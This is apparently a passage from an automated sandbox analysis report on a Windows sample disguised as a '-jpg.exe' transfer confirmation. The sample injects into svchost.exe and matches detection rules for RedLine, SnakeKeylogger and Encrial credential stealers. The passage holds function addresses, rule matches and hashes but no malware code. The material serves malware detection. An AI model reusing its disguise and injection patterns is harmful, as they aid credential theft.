                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_00444FD20_2_00444FD2
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: 0_2_03C336780_2_03C33678
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_000C27202_2_000C2720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408C602_2_00408C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC112_2_0040DC11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407C3F2_2_00407C3F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418CCC2_2_00418CCC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406CA02_2_00406CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028B02_2_004028B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004182442_2_00418244
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016502_2_00401650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F202_2_00402F20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004193C42_2_004193C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187882_2_00418788
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F892_2_00402F89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B902_2_00402B90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004073A02_2_004073A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FD4F02_2_051FD4F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FC4E02_2_051FC4E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FD7C82_2_051FD7C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051F76302_2_051F7630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FD2182_2_051FD218
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FA2F02_2_051FA2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FCC682_2_051FCC68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FCF402_2_051FCF40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051F6EB82_2_051F6EB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051F2EF82_2_051F2EF8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FEEE02_2_051FEEE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FC9902_2_051FC990
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051F58902_2_051F5890
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FD4EA2_2_051FD4EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FD7B82_2_051FD7B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FC6A82_2_051FC6A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051F43202_2_051F4320
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FD20A2_2_051FD20A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FCC582_2_051FCC58
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FCF302_2_051FCF30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FEED02_2_051FEED0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051FC9802_2_051FC980
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_051F586F2_2_051F586F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09197C302_2_09197C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09196E602_2_09196E60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_091961E02_2_091961E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919A2D02_2_0919A2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_091975482_2_09197548
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919E5E02_2_0919E5E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919FC0F2_2_0919FC0F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09197C2A2_2_09197C2A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919FC202_2_0919FC20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919DE382_2_0919DE38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919DE482_2_0919DE48
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09196E4F2_2_09196E4F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_091961D02_2_091961D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919126F2_2_0919126F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_091912802_2_09191280
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919A2C72_2_0919A2C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0919753A2_2_0919753A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_091956F02_2_091956F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_091956E22_2_091956E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924F8102_2_0924F810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924DFD82_2_0924DFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924EA382_2_0924EA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924CE782_2_0924CE78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092439202_2_09243920
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09246D312_2_09246D31
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09249D082_2_09249D08
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092439102_2_09243910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09243D682_2_09243D68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09243D782_2_09243D78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09246D402_2_09246D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092441BF2_2_092441BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092471882_2_09247188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092471982_2_09247198
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092475E12_2_092475E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092475F02_2_092475F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092441D02_2_092441D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092460282_2_09246028
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924C0302_2_0924C030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092460382_2_09246038
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092400062_2_09240006
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092490002_2_09249000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924C01F2_2_0924C01F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092430602_2_09243060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092430702_2_09243070
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924C47A2_2_0924C47A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092400402_2_09240040
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924944A2_2_0924944A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092494582_2_09249458
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092498A12_2_092498A1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092498B02_2_092498B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092434B92_2_092434B9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092464802_2_09246480
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924C4882_2_0924C488
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092464902_2_09246490
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924C8E02_2_0924C8E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092468E82_2_092468E8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092434C82_2_092434C8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092468D72_2_092468D7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924C8D02_2_0924C8D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092453202_2_09245320
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924B3282_2_0924B328
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924D7282_2_0924D728
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092453302_2_09245330
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924D7172_2_0924D717
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924B31A2_2_0924B31A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092457772_2_09245777
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924B7702_2_0924B770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924DB712_2_0924DB71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092487402_2_09248740
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092487502_2_09248750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09248BA82_2_09248BA8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924B7802_2_0924B780
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924DB802_2_0924DB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092457882_2_09245788
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09248B992_2_09248B99
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09245BE02_2_09245BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09248FEF2_2_09248FEF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924F7FF2_2_0924F7FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924DFC72_2_0924DFC7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924BBC82_2_0924BBC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09245BD22_2_09245BD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924BBD82_2_0924BBD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092446282_2_09244628
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924EA292_2_0924EA29
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09247A382_2_09247A38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924461A2_2_0924461A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924CE682_2_0924CE68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924AA6A2_2_0924AA6A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09244A702_2_09244A70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924AA782_2_0924AA78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09247A482_2_09247A48
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09247EA02_2_09247EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924AEBF2_2_0924AEBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09244A802_2_09244A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09247E8F2_2_09247E8F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092482E92_2_092482E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_092482F82_2_092482F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924D2C22_2_0924D2C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09244EC92_2_09244EC9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924AED02_2_0924AED0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0924D2D02_2_0924D2D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09244ED82_2_09244ED8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_096A4A802_2_096A4A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_096A31A82_2_096A31A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_096AAD302_2_096AAD30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 44 times
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeCode function: String function: 00445AE0 appears 65 times
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2197933004.000000000417D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000003.2198701351.0000000003FD3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe, 00000000.00000002.2200420683.0000000003E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                Source: #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe.3e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.svchost.exe.7e10000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.3.svchost.exe.3271f20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.svchost.exe.7d50f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.3.svchost.exe.3271000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.3.svchost.exe.3271000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.svchost.exe.7e10000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.3.svchost.exe.3271f20.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.svchost.exe.3374f2e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.svchost.exe.3374f2e.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.svchost.exe.7d50f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
